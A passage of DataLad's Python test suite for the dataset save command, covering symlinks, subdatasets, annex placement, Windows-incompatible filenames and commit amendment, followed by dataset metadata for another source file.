parent.save('sub1')\n sub1.save('sub2')\n assert_raises(CommandError, parent.save, 'sub1', recursive=True)\n # and should not fail in the top level superdataset\n with chpwd(parent.path):\n save('sub1')\n # or in a subdataset above the problematic one\n with chpwd(sub1.path):\n save('sub2')\n\n\n@skip_wo_symlink_capability\n@with_tempfile(mkdir=True)\ndef test_symlinked_relpath(path=None):\n # initially ran into on OSX https://github.com/datalad/datalad/issues/2406\n os.makedirs(op.join(path, \"origin\"))\n dspath = op.join(path, \"linked\")\n os.symlink('origin', 
dspath)\n ds = Dataset(dspath).create()\n create_tree(dspath, {\n \"mike1\": 'mike1', # will be added from topdir\n \"later\": \"later\", # later from within subdir\n \"d\": {\n \"mike2\": 'mike2', # to be added within subdir\n }\n })\n\n # in the root of ds\n with chpwd(dspath):\n ds.repo.add(\"mike1\", git=True)\n ds.save(message=\"committing\", path=\"./mike1\")\n\n # Let's also do in subdirectory as CWD, check that relative path\n # given to a plain command (not dataset method) are treated as\n # relative to CWD\n with chpwd(op.join(dspath, 'd')):\n save(dataset=ds.path,\n message=\"committing\",\n path=\"mike2\")\n\n later = op.join(op.pardir, \"later\")\n ds.repo.add(later, git=True)\n save(dataset=ds.path, message=\"committing\", path=later)\n\n assert_repo_status(dspath)\n\n\n@skip_wo_symlink_capability\n@with_tempfile(mkdir=True)\ndef test_bf1886(path=None):\n parent = Dataset(path).create()\n parent.create('sub')\n assert_repo_status(parent.path)\n # create a symlink pointing down to the subdataset, and add it\n os.symlink('sub', op.join(parent.path, 'down'))\n parent.save('down')\n assert_repo_status(parent.path)\n # now symlink pointing up\n os.makedirs(op.join(parent.path, 'subdir', 'subsubdir'))\n os.symlink(op.join(op.pardir, 'sub'), op.join(parent.path, 'subdir', 'up'))\n parent.save(op.join('subdir', 'up'))\n # 'all' to avoid the empty dir being listed\n assert_repo_status(parent.path, untracked_mode='all')\n # now symlink pointing 2xup, as in #1886\n os.symlink(\n op.join(op.pardir, op.pardir, 'sub'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup'))\n parent.save(op.join('subdir', 'subsubdir', 'upup'))\n assert_repo_status(parent.path)\n # simultaneously add a subds and a symlink pointing to it\n # create subds, but don't register it\n create(op.join(parent.path, 'sub2'))\n os.symlink(\n op.join(op.pardir, op.pardir, 'sub2'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup2'))\n parent.save(['sub2', op.join('subdir', 'subsubdir', 'upup2')])\n assert_repo_status(parent.path)\n # full replication of #1886: the above but be in subdir of symlink\n # with no reference dataset\n create(op.join(parent.path, 'sub3'))\n os.symlink(\n op.join(op.pardir, op.pardir, 'sub3'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup3'))\n # need to use absolute paths\n with chpwd(op.join(parent.path, 'subdir', 'subsubdir')):\n save([op.join(parent.path, 'sub3'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup3')])\n assert_repo_status(parent.path)\n\n\n@with_tree({\n '1': '',\n '2': '',\n '3': ''})\ndef test_gh2043p1(path=None):\n # this tests documents the interim agreement on what should happen\n # in the case documented in gh-2043\n ds = Dataset(path).create(force=True)\n ds.save('1')\n assert_repo_status(ds.path, untracked=['2', '3'])\n ds.unlock('1')\n assert_repo_status(\n ds.path,\n # on windows we are in an unlocked branch by default, hence\n # we would see no change\n modified=[] if ds.repo.is_managed_branch() else ['1'],\n untracked=['2', '3'])\n # save(.) 
should recommit unlocked file, and not touch anything else\n # this tests the second issue in #2043\n with chpwd(path):\n # only save modified bits\n save(path='.', updated=True)\n # state of the file (unlocked/locked) is committed as well, and the\n # test doesn't lock the file again\n assert_repo_status(ds.path, untracked=['2', '3'])\n with chpwd(path):\n # but when a path is given, anything that matches this path\n # untracked or not is added/saved\n save(path='.')\n # state of the file (unlocked/locked) is committed as well, and the\n # test doesn't lock the file again\n assert_repo_status(ds.path)\n\n\n@with_tree({\n 'staged': 'staged',\n 'untracked': 'untracked'})\ndef test_bf2043p2(path=None):\n ds = Dataset(path).create(force=True)\n ds.repo.add('staged')\n assert_repo_status(ds.path, added=['staged'], untracked=['untracked'])\n # save -u does not commit untracked content\n # this tests the second issue in #2043\n with chpwd(path):\n save(updated=True)\n assert_repo_status(ds.path, untracked=['untracked'])\n\n\n@with_tree({\n OBSCURE_FILENAME + u'_staged': 'staged',\n OBSCURE_FILENAME + u'_untracked': 'untracked'})\ndef test_encoding(path=None):\n staged = OBSCURE_FILENAME + u'_staged'\n untracked = OBSCURE_FILENAME + u'_untracked'\n ds = Dataset(path).create(force=True)\n ds.repo.add(staged)\n assert_repo_status(ds.path, added=[staged], untracked=[untracked])\n ds.save(updated=True)\n assert_repo_status(ds.path, untracked=[untracked])\n\n\n@with_tree(**tree_arg)\ndef test_add_files(path=None):\n ds = Dataset(path).create(force=True)\n\n test_list_1 = ['test_annex.txt']\n test_list_2 = ['test.txt']\n test_list_3 = ['test1.dat', 'test2.dat']\n test_list_4 = [op.join('dir', 'testindir'),\n op.join('dir', OBSCURE_FILENAME)]\n\n for arg in [(test_list_1[0], False),\n (test_list_2[0], True),\n (test_list_3, False),\n (test_list_4, False)]:\n # special case 4: give the dir:\n if arg[0] == test_list_4:\n result = ds.save('dir', to_git=arg[1])\n status = ds.repo.get_content_annexinfo(['dir'])\n else:\n result = ds.save(arg[0], to_git=arg[1])\n for a in ensure_list(arg[0]):\n assert_result_count(result, 1, path=str(ds.pathobj / a))\n status = ds.repo.get_content_annexinfo(\n ut.Path(p) for p in ensure_list(arg[0]))\n for f, p in status.items():\n if arg[1]:\n assert p.get('key', None) is None, f\n else:\n assert p.get('key', None) is not None, f\n\n\n@with_tree(**tree_arg)\n@with_tempfile(mkdir=True)\ndef test_add_subdataset(path=None, other=None):\n subds = create(op.join(path, 'dir'), force=True)\n ds = create(path, force=True)\n ok_(subds.repo.dirty)\n ok_(ds.repo.dirty)\n assert_not_in('dir', ds.subdatasets(result_xfm='relpaths'))\n # \"add everything in subds to subds\"\n save(dataset=subds.path)\n assert_repo_status(subds.path)\n assert_not_in('dir', ds.subdatasets(result_xfm='relpaths'))\n # but with a base directory we add the dataset subds as a subdataset\n # to ds\n res = ds.save(subds.path)\n assert_in_results(res, action=\"add\", path=subds.path, refds=ds.path)\n res = ds.subdatasets()\n assert_result_count(res, 1)\n assert_result_count(\n res, 1,\n # essentials\n path=op.join(ds.path, 'dir'),\n gitmodule_url='./dir',\n gitmodule_name='dir',\n )\n # create another one\n other = create(other)\n # install into superdataset, but don't add\n other_clone = install(source=other.path, path=op.join(ds.path, 'other'))\n # little dance to get the revolution-type dataset\n other_clone = Dataset(other_clone.path)\n ok_(other_clone.is_installed)\n assert_not_in('other', 
ds.subdatasets(result_xfm='relpaths'))\n # now add, it should pick up the source URL\n ds.save('other')\n # and that is why, we can reobtain it from origin\n ds.drop('other', what='all', reckless='kill', recursive=True)\n ok_(not other_clone.is_installed())\n ds.get('other')\n ok_(other_clone.is_installed())\n\n\n# CommandError: command '['git', '-c', 'receive.autogc=0', '-c', 'gc.auto=0', 'annex', 'add', '--json', '--', 'empty', 'file.txt']' failed with exitcode 1\n# Failed to run ['git', '-c', 'receive.autogc=0', '-c', 'gc.auto=0', 'annex', 'add', '--json', '--', 'empty', 'file.txt'] under 'C:\\\\Users\\\\appveyor\\\\AppData\\\\Local\\\\Temp\\\\1\\\\datalad_temp_tree_j2mk92y3'. Exit code=1.\n@known_failure_windows\n@with_tree(tree={\n 'file.txt': 'some text',\n 'empty': '',\n 'file2.txt': 'some text to go to annex',\n '.gitattributes': '* annex.largefiles=(not(mimetype=text/*))'}\n)\ndef test_add_mimetypes(path=None):\n ds = Dataset(path).create(force=True)\n ds.repo.add('.gitattributes')\n ds.repo.commit('added attributes to git explicitly')\n # now test that those files will go into git/annex correspondingly\n # WINDOWS FAILURE NEXT\n __not_tested__ = ds.save(['file.txt', 'empty'])\n assert_repo_status(path, untracked=['file2.txt'])\n # But we should be able to force adding file to annex when desired\n ds.save('file2.txt', to_git=False)\n # check annex file status\n annexinfo = ds.repo.get_content_annexinfo()\n for path, in_annex in (\n # Empty one considered to be application/octet-stream\n # i.e. non-text\n ('empty', True),\n ('file.txt', False),\n ('file2.txt', True)):\n # low-level API report -> repo path reference, no ds path\n p = ds.repo.pathobj / path\n assert_in(p, annexinfo)\n if in_annex:\n assert_in('key', annexinfo[p], p)\n else:\n assert_not_in('key', annexinfo[p], p)\n\n\n@with_tempfile(mkdir=True)\ndef test_gh1597(path=None):\n ds = Dataset(path).create()\n sub = ds.create('sub')\n res = ds.subdatasets()\n assert_result_count(res, 1, path=sub.path)\n # now modify .gitmodules with another command\n ds.subdatasets(contains=sub.path, set_property=[('this', 'that')])\n # now modify low-level\n with open(op.join(ds.path, '.gitmodules'), 'a') as f:\n f.write('\\n')\n assert_repo_status(ds.path, modified=['.gitmodules'])\n ds.save('.gitmodules')\n # must not come under annex management\n assert_not_in(\n 'key',\n ds.repo.get_content_annexinfo(paths=['.gitmodules']).popitem()[1])\n\n\n@with_tempfile(mkdir=True)\ndef test_gh1597_simpler(path=None):\n ds = Dataset(path).create()\n # same goes for .gitattributes\n with open(op.join(ds.path, '.gitignore'), 'a') as f:\n f.write('*.swp\\n')\n ds.save('.gitignore')\n assert_repo_status(ds.path)\n # put .gitattributes in some subdir and add all, should also go into Git\n attrfile = op.join ('subdir', '.gitattributes')\n ds.repo.set_gitattributes(\n [('*', dict(mycustomthing='this'))],\n attrfile)\n assert_repo_status(ds.path, untracked=[attrfile], untracked_mode='all')\n ds.save()\n assert_repo_status(ds.path)\n # no annex key, not in annex\n assert_not_in(\n 'key',\n ds.repo.get_content_annexinfo([ut.Path(attrfile)]).popitem()[1])\n\n\n@with_tempfile(mkdir=True)\ndef test_update_known_submodule(path=None):\n def get_baseline(p):\n ds = Dataset(p).create()\n sub = create(str(ds.pathobj / 'sub'))\n assert_repo_status(ds.path, untracked=['sub'])\n return ds\n # attempt one\n ds = get_baseline(op.join(path, 'wo_ref'))\n with chpwd(ds.path):\n save(recursive=True)\n assert_repo_status(ds.path)\n\n # attempt two, same as above but call add 
via reference dataset\n ds = get_baseline(op.join(path, 'w_ref'))\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_add_recursive(path=None):\n # make simple hierarchy\n parent = Dataset(path).create()\n assert_repo_status(parent.path)\n sub1 = parent.create(op.join('down', 'sub1'))\n assert_repo_status(parent.path)\n sub2 = parent.create('sub2')\n # next one make the parent dirty\n subsub = sub2.create('subsub')\n assert_repo_status(parent.path, modified=['sub2'])\n res = parent.save()\n assert_repo_status(parent.path)\n\n # now add content deep in the hierarchy\n create_tree(subsub.path, {'new': 'empty'})\n assert_repo_status(parent.path, modified=['sub2'])\n\n # recursive add should not even touch sub1, because\n # it knows that it is clean\n res = parent.save(recursive=True, jobs=5)\n # the key action is done\n assert_result_count(\n res, 1, path=op.join(subsub.path, 'new'), action='add', status='ok')\n # saved all the way up\n assert_result_count(res, 3, action='save', status='ok')\n assert_repo_status(parent.path)\n\n\n@with_tree(**tree_arg)\ndef test_relpath_add(path=None):\n ds = Dataset(path).create(force=True)\n with chpwd(op.join(path, 'dir')):\n eq_(save('testindir')[0]['path'],\n op.join(ds.path, 'dir', 'testindir'))\n # and now add all\n save('..')\n # auto-save enabled\n assert_repo_status(ds.path)\n\n\n@skip_wo_symlink_capability\n@with_tempfile()\ndef test_bf2541(path=None):\n ds = create(path)\n subds = ds.create('sub')\n assert_repo_status(ds.path)\n os.symlink('sub', op.join(ds.path, 'symlink'))\n with chpwd(ds.path):\n res = save(recursive=True)\n assert_repo_status(ds.path)\n\n\n@with_tempfile()\ndef test_remove_subds(path=None):\n ds = create(path)\n ds.create('sub')\n ds.create(op.join('sub', 'subsub'))\n assert_repo_status(ds.path)\n assert_result_count(\n ds.subdatasets(), 1,\n path=op.join(ds.path, 'sub'))\n # all good at this point, subdataset known, dataset clean\n # now have some external force wipe out the subdatasets\n rmtree(op.join(ds.path, 'sub'))\n assert_result_count(\n ds.status(), 1,\n path=op.join(ds.path, 'sub'),\n state='deleted')\n # a single call to save() must fix up the mess\n assert_status('ok', ds.save())\n assert_repo_status(ds.path)\n\n\n@with_tempfile()\ndef test_partial_unlocked(path=None):\n # https://github.com/datalad/datalad/issues/1651\n ds = create(path)\n (ds.pathobj / 'normal.txt').write_text(u'123')\n ds.save()\n assert_repo_status(ds.path)\n ds.unlock('normal.txt')\n ds.save()\n # mixed git and git-annex'ed files\n (ds.pathobj / 'ingit.txt').write_text(u'234')\n ds.save(to_git=True)\n (ds.pathobj / 'culprit.txt').write_text(u'345')\n (ds.pathobj / 'ingit.txt').write_text(u'modified')\n ds.save()\n assert_repo_status(ds.path)\n # but now a change in the attributes\n if '10.20220127' <= ds.repo.git_annex_version < '10.20220322':\n raise SkipTest(\"annex bug https://git-annex.branchable.com/bugs/Change_to_annex.largefiles_leaves_repo_modified/\")\n ds.unlock('culprit.txt')\n ds.repo.set_gitattributes([\n ('*', {'annex.largefiles': 'nothing'})])\n ds.save()\n assert_repo_status(ds.path)\n\n\n@with_tree({'.gitattributes': \"* annex.largefiles=(largerthan=4b)\",\n \"foo\": \"in annex\"})\ndef test_save_partial_commit_shrinking_annex(path=None):\n # This is a variation on the test above. 
The main difference is that there\n # are other staged changes in addition to the unlocked filed.\n ds = create(path, force=True)\n ds.save()\n assert_repo_status(ds.path)\n ds.unlock(path=\"foo\")\n create_tree(ds.path, tree={\"foo\": \"a\", \"staged\": \"\"},\n remove_existing=True)\n # Even without this staged change, a plain 'git commit -- foo' would fail\n # with git-annex's partial index error, but save (or more specifically\n # GitRepo.save_) drops the pathspec if there are no staged changes.\n ds.repo.add(\"staged\", git=True)\n ds.save(path=\"foo\")\n assert_repo_status(ds.path, added=[\"staged\"])\n\n\n@with_tempfile()\ndef test_path_arg_call(path=None):\n ds = create(path)\n for testfile in (\n ds.pathobj / 'abs.txt',\n ds.pathobj / 'rel.txt'):\n testfile.write_text(u'123')\n # we used to resolve relative paths against a dataset just given by\n # a path, but we no longer do that\n #save(dataset=ds.path, path=[testfile.name], to_git=True)\n save(dataset=ds, path=[testfile.name], to_git=True)\n\n\n# one can't create these file names on FAT/NTFS systems\n@skip_if_adjusted_branch\n@with_tempfile\ndef test_windows_incompatible_names(path=None):\n ds = Dataset(path).create()\n create_tree(path, {\n 'imgood': 'Look what a nice name I have',\n 'illegal:character.txt': 'strange choice of name',\n 'spaceending ': 'who does these things?',\n 'lookmumadot.': 'why would you do this?',\n 'COM1.txt': 'I am a serial port',\n 'dirs with spaces': {\n 'seriously?': 'you are stupid',\n 'why somuch?wrongstuff.': \"I gave up\"\n },\n })\n ds.repo.config.set('datalad.save.windows-compat-warning', 'error')\n ds.save('.datalad/config')\n res = ds.save(on_failure='ignore')\n # check that none of the 6 problematic files was saved, but the good one was\n assert_result_count(res, 6, status='impossible', action='save')\n assert_result_count(res, 1, status='ok', action='save')\n\n # check that the warning is emitted\n ds.repo.config.set('datalad.save.windows-compat-warning', 'warning')\n ds.save('.datalad/config')\n with swallow_logs(new_level=logging.WARN) as cml:\n ds.save()\n cml.assert_logged(\n \"Some elements of your dataset are not compatible with Windows \"\n \"systems. Disable this check by changing \"\n \"datalad.save.windows-compat-warning or consider renaming the \"\n \"following elements:\")\n assert_in(\"Elements using a reserved filename:\", cml.out)\n assert_in(\"Elements with illegal characters:\", cml.out)\n assert_in(\"Elements ending with a dot:\", cml.out)\n assert_in(\"Elements ending with a space:\", cml.out)\n\n # check that a setting of 'none' really does nothing\n ds.repo.config.set('datalad.save.windows-compat-warning', 'none')\n ds.save('.datalad/config')\n create_tree(path, {\n 'more illegal:characters?.py': 'My arch nemesis uses Windows and I will'\n 'destroy them! Muahahaha'\n })\n with swallow_logs(new_level=logging.WARN) as cml:\n res = ds.save()\n # we shouldn't see warnings\n assert_not_in(\n \"Some elements of your dataset are not compatible with Windows \"\n \"systems. 
Disable this check by changing \"\n \"datalad.save.windows-compat-warning or consider renaming the \"\n \"following elements:\", cml.out)\n # make sure the file is saved successfully\n assert_result_count(res, 1, status='ok', action='save')\n\n\n@with_tree(tree={\n 'file.txt': 'some text',\n 'd1': {\n 'subrepo': {\n 'subfile': 'more repo text',\n },\n },\n 'd2': {\n 'subds': {\n 'subfile': 'more ds text',\n },\n },\n})\ndef test_surprise_subds(path=None):\n # https://github.com/datalad/datalad/issues/3139\n ds = create(path, force=True)\n # a lonely repo without any commit\n somerepo = AnnexRepo(path=op.join(path, 'd1', 'subrepo'), create=True)\n # a proper subdataset\n subds = create(op.join(path, 'd2', 'subds'), force=True)\n\n # If subrepo is an adjusted branch, it would have a commit, making most of\n # this test irrelevant because it is about the unborn branch edge case.\n adjusted = somerepo.is_managed_branch()\n # This edge case goes away with Git v2.22.0.\n fixed_git = somerepo.git_version >= '2.22.0'\n\n # save non-recursive\n res = ds.save(recursive=False, on_failure='ignore')\n if not adjusted and fixed_git:\n # We get an appropriate error about no commit being checked out.\n assert_in_results(res, action='add_submodule', status='error')\n\n # the content of both subds and subrepo are not added to their\n # respective parent as no --recursive was given\n assert_repo_status(subds.path, untracked=['subfile'])\n assert_repo_status(somerepo.path, untracked=['subfile'])\n\n if adjusted or fixed_git:\n if adjusted:\n # adjusted branch: #datalad/3178 (that would have a commit)\n modified = [subds.repo.pathobj, somerepo.pathobj]\n untracked = []\n else:\n # Newer Git versions refuse to add a sub-repository with no commits\n # checked out.\n modified = [subds.repo.pathobj]\n untracked = ['d1']\n assert_repo_status(ds.path, modified=modified, untracked=untracked)\n assert_not_in(ds.repo.pathobj / 'd1' / 'subrepo' / 'subfile',\n ds.repo.get_content_info())\n else:\n # however, while the subdataset is added (and reported as modified\n # because it content is still untracked) the subrepo\n # cannot be added (it has no commit)\n # worse: its untracked file add been added to the superdataset\n assert_repo_status(ds.path, modified=['d2/subds'])\n assert_in(ds.repo.pathobj / 'd1' / 'subrepo' / 'subfile',\n ds.repo.get_content_info())\n # with proper subdatasets, all evil is gone\n assert_not_in(ds.repo.pathobj / 'd2' / 'subds' / 'subfile',\n ds.repo.get_content_info())\n\n\n@with_tree({\"foo\": \"\"})\ndef test_bf3285(path=None):\n ds = Dataset(path).create(force=True)\n # Note: Using repo.pathobj matters in the \"TMPDIR=/var/tmp/sym\\ link\" case\n # because assert_repo_status is based off of {Annex,Git}Repo.path, which is\n # the realpath'd path (from the processing in _flyweight_id_from_args).\n subds = create(ds.repo.pathobj.joinpath(\"subds\"))\n # Explicitly saving a path does not save an untracked, unspecified\n # subdataset.\n ds.save(\"foo\")\n assert_repo_status(ds.path, untracked=[subds.path])\n\n\n@with_tree({\"outside\": \"\",\n \"ds\": {\"within\": \"\"}})\ndef test_on_failure_continue(path=None):\n ds = Dataset(op.join(path, \"ds\")).create(force=True)\n # save() calls status() in a way that respects on_failure.\n assert_in_results(\n ds.save(path=[op.join(path, \"outside\"),\n op.join(path, \"ds\", \"within\")],\n on_failure=\"ignore\"),\n action=\"status\",\n status=\"error\")\n # save() continued despite the failure and saved ds/within.\n 
assert_repo_status(ds.path)\n\n\n@with_tree(tree={OBSCURE_FILENAME: \"abc\"})\ndef test_save_obscure_name(path=None):\n ds = Dataset(path).create(force=True)\n fname = OBSCURE_FILENAME\n # Just check that we don't fail with a unicode error.\n with swallow_outputs():\n ds.save(path=fname, result_renderer=\"default\")\n\n\n@with_tree(tree={\n \".dot\": \"ab\", \"nodot\": \"cd\",\n \"nodot-subdir\": {\".dot\": \"ef\", \"nodot\": \"gh\"},\n \".dot-subdir\": {\".dot\": \"ij\", \"nodot\": \"kl\"}})\ndef check_save_dotfiles(to_git, save_path, path):\n # Note: Take relpath to work with Travis \"TMPDIR=/var/tmp/sym\\ link\" run.\n paths = [Path(op.relpath(op.join(root, fname), path))\n for root, _, fnames in os.walk(op.join(path, save_path or \"\"))\n for fname in fnames]\n ok_(paths)\n ds = Dataset(path).create(force=True)\n ds.save(save_path, to_git=to_git)\n if save_path is None:\n assert_repo_status(ds.path)\n repo = ds.repo\n annexinfo = repo.get_content_annexinfo()\n\n def _check(fn, p):\n fn(\"key\", annexinfo[repo.pathobj / p], p)\n\n if to_git:\n def check(p):\n _check(assert_not_in, p)\n else:\n def check(p):\n _check(assert_in, p)\n\n for path in paths:\n check(path)\n\n\[email protected](\n \"git,save_path\",\n itertools.product(\n [True, False, None],\n [None, \"nodot-subdir\"],\n )\n)\ndef test_save_dotfiles(git, save_path):\n check_save_dotfiles(git, save_path)\n\n\n@with_tempfile\ndef test_save_nested_subs_explicit_paths(path=None):\n ds = Dataset(path).create()\n spaths = [Path(\"s1\"), Path(\"s1\", \"s2\"), Path(\"s1\", \"s2\", \"s3\")]\n for spath in spaths:\n Dataset(ds.pathobj / spath).create()\n ds.save(path=spaths)\n eq_(set(ds.subdatasets(recursive=True, result_xfm=\"relpaths\")),\n set(map(str, spaths)))\n\n\n@with_tempfile\ndef test_save_gitrepo_annex_subds_adjusted(path=None):\n ds = Dataset(path).create(annex=False)\n subds = ds.create(\"sub\")\n maybe_adjust_repo(subds.repo)\n (subds.pathobj / \"foo\").write_text(\"foo\")\n subds.save()\n ds.save()\n assert_repo_status(ds.path)\n\n\n@known_failure\n@with_tempfile\ndef test_save_adjusted_partial(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"sub\")\n maybe_adjust_repo(subds.repo)\n (subds.pathobj / \"foo\").write_text(\"foo\")\n subds.save()\n (ds.pathobj / \"other\").write_text(\"staged, not for committing\")\n ds.repo.call_git([\"add\", \"other\"])\n ds.save(path=[\"sub\"])\n assert_repo_status(ds.path, added=[\"other\"])\n\n\n@with_tempfile\ndef test_save_diff_ignore_submodules_config(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"sub\")\n (subds.pathobj / \"foo\").write_text(\"foo\")\n subds.save()\n ds.repo.config.set(\"diff.ignoreSubmodules\", \"all\",\n scope=\"local\", reload=True)\n # Saving a subdataset doesn't fail when diff.ignoreSubmodules=all.\n ds.save()\n assert_repo_status(ds.path)\n\n\n@with_tree({\"subdir\": {\"foo\": \"foocontent\"}})\ndef test_save_git_mv_fixup(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n assert_repo_status(ds.path)\n ds.repo.call_git([\"mv\", op.join(\"subdir\", \"foo\"), \"foo\"])\n ds.save()\n # Was link adjusted properly? 
(gh-3686)\n assert (ds.pathobj / 'foo').read_text() == \"foocontent\"\n # all clean\n assert_repo_status(ds.path)\n\n\n@with_tree(tree={'somefile': 'file content',\n 'subds': {'file_in_sub': 'other'}})\ndef test_save_amend(dspath=None):\n\n dspath = Path(dspath)\n file_in_super = dspath / 'somefile'\n file_in_sub = dspath / 'subds' / 'file_in_sub'\n\n # test on a hierarchy including a plain git repo:\n ds = Dataset(dspath).create(force=True, annex=False)\n subds = ds.create('subds', force=True)\n ds.save(recursive=True)\n assert_repo_status(ds.repo)\n\n # recursive and amend are mutually exclusive:\n for d in (ds, subds):\n assert_raises(ValueError, d.save, recursive=True, amend=True)\n\n # in an annex repo the branch we are interested in might not be the active\n # branch (adjusted):\n sub_branch = subds.repo.get_corresponding_branch()\n\n # amend in subdataset w/ new message; otherwise empty amendment:\n last_sha = subds.repo.get_hexsha(sub_branch)\n subds.save(message=\"new message in sub\", amend=True)\n # we did in fact commit something:\n neq_(last_sha, subds.repo.get_hexsha(sub_branch))\n # repo is clean:\n assert_repo_status(subds.repo)\n # message is correct:\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n # actually replaced the previous commit:\n assert_not_in(last_sha, subds.repo.get_branch_commits_(sub_branch))\n\n # amend modifications in subdataset w/o new message\n if not subds.repo.is_managed_branch():\n subds.unlock('file_in_sub')\n file_in_sub.write_text(\"modified again\")\n last_sha = subds.repo.get_hexsha(sub_branch)\n subds.save(amend=True)\n neq_(last_sha, subds.repo.get_hexsha(sub_branch))\n assert_repo_status(subds.repo)\n # message unchanged:\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n # actually replaced the previous commit:\n assert_not_in(last_sha, subds.repo.get_branch_commits_(sub_branch))\n\n # save --amend with nothing to amend with:\n res = subds.save(amend=True)\n assert_result_count(res, 1)\n assert_result_count(res, 1, status='notneeded', action='save')\n\n # amend in superdataset w/ new message; otherwise empty amendment:\n last_sha = ds.repo.get_hexsha()\n ds.save(message=\"new message in super\", amend=True)\n neq_(last_sha, ds.repo.get_hexsha())\n assert_repo_status(subds.repo)\n eq_(ds.repo.format_commit(\"%B\").strip(), \"new message in super\")\n assert_not_in(last_sha, ds.repo.get_branch_commits_())\n\n # amend modifications in superdataset w/o new message\n file_in_super.write_text(\"changed content\")\n if not subds.repo.is_managed_branch():\n subds.unlock('file_in_sub')\n file_in_sub.write_text(\"modified once again\")\n last_sha = ds.repo.get_hexsha()\n last_sha_sub = subds.repo.get_hexsha(sub_branch)\n ds.save(amend=True)\n neq_(last_sha, ds.repo.get_hexsha())\n eq_(ds.repo.format_commit(\"%B\").strip(), \"new message in super\")\n assert_not_in(last_sha, ds.repo.get_branch_commits_())\n # we didn't mess with the subds:\n assert_repo_status(ds.repo, modified=[\"subds\"])\n eq_(last_sha_sub, subds.repo.get_hexsha(sub_branch))\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n\n # save --amend with nothing to amend with:\n last_sha = ds.repo.get_hexsha()\n res = ds.save(amend=True)\n assert_result_count(res, 1)\n assert_result_count(res, 1, status='notneeded', action='save')\n eq_(last_sha, ds.repo.get_hexsha())\n # we didn't mess with the subds:\n assert_repo_status(ds.repo, modified=[\"subds\"])\n eq_(last_sha_sub, 
subds.repo.get_hexsha(sub_branch))\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n\n # amend with different identity:\n orig_author = ds.repo.format_commit(\"%an\")\n orig_email = ds.repo.format_commit(\"%ae\")\n orig_date = ds.repo.format_commit(\"%ad\")\n orig_committer = ds.repo.format_commit(\"%cn\")\n orig_committer_mail = ds.repo.format_commit(\"%ce\")\n eq_(orig_author, orig_committer)\n eq_(orig_email, orig_committer_mail)\n with patch.dict('os.environ',\n {'GIT_COMMITTER_NAME': 'Hopefully Different',\n 'GIT_COMMITTER_EMAIL': '[email protected]'}):\n\n ds.config.reload(force=True)\n ds.save(amend=True, message=\"amend with hope\")\n # author was kept:\n eq_(orig_author, ds.repo.format_commit(\"%an\"))\n eq_(orig_email, ds.repo.format_commit(\"%ae\"))\n eq_(orig_date, ds.repo.format_commit(\"%ad\"))\n # committer changed:\n eq_(ds.repo.format_commit(\"%cn\"), \"Hopefully Different\")\n eq_(ds.repo.format_commit(\"%ce\"), \"[email protected]\")\n\n # corner case: amend empty commit with no parent:\n rmtree(str(dspath))\n # When adjusted branch is enforced by git-annex detecting a crippled FS,\n # git-annex produces an empty commit before switching to adjusted branch:\n # \"commit before entering adjusted branch\"\n # The commit by `create` would be the second one already.\n # Therefore go with plain annex repo and create an (empty) commit only when\n # not on adjusted branch:\n repo = AnnexRepo(dspath, create=True)\n if not repo.is_managed_branch():\n repo.commit(msg=\"initial\", options=['--allow-empty'])\n ds = Dataset(dspath)\n branch = ds.repo.get_corresponding_branch() or ds.repo.get_active_branch()\n # test pointless if we start with more than one commit\n eq_(len(list(ds.repo.get_branch_commits_(branch))),\n 1,\n msg=\"More than on commit '{}': {}\".format(\n branch, ds.repo.call_git(['log', branch]))\n )\n last_sha = ds.repo.get_hexsha(branch)\n\n ds.save(message=\"new initial commit\", amend=True)\n assert_repo_status(ds.repo)\n eq_(len(list(ds.repo.get_branch_commits_(branch))),\n 1,\n msg=\"More than on commit '{}': {}\".format(\n branch, ds.repo.call_git(['log', branch]))\n )\n assert_not_in(last_sha, ds.repo.get_branch_commits_(branch))\n eq_(ds.repo.format_commit(\"%B\", branch).strip(), \"new initial commit\")\n\n\n@with_tempfile\ndef test_save_sub_trailing_sep_bf6547(path=None):\n ds = Dataset(path).create()\n # create not-yet-subdataset inside\n subds = Dataset(ds.pathobj / 'sub').create()\n ds.save(path='sub' + os.path.sep)\n assert_in_results(\n ds.subdatasets(result_renderer='disabled'),\n path=subds.path,\n )\n # make sure it has the .gitmodules record\n assert 'sub' in (ds.pathobj / '.gitmodules').read_text()\n" }, { "alpha_fraction": 0.5619733333587646, "alphanum_fraction": 0.56272953748703, "avg_line_length": 40.69669723510742, "blob_id": "a5b2ec2e44a21634fd4974923489075699d0791a", "content_id": "e4c31c8816f655b948e14f234a90ce4381bc5f0c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27770, "license_type": "permissive", "max_line_length": 113, "num_lines": 666, "path": "/datalad/distributed/create_sibling_gitlab.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad 
